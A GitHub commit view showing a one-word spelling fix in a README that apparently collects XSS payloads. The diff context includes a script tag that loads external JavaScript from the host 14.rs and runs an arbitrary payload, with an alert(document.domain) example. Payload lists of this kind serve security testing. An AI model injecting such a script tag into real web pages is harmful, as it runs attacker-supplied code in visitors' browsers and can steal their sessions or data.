Update README.md

Correct misspelling
patch-1
Isopach 2018-07-31 18:02:38 +09:00 committed by GitHub
parent 6524c8e544
commit 8e26277407
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -92,7 +92,7 @@ XSS for HTML5
XSS using script tag (external payload)
```javascript
<script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload
you can also specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```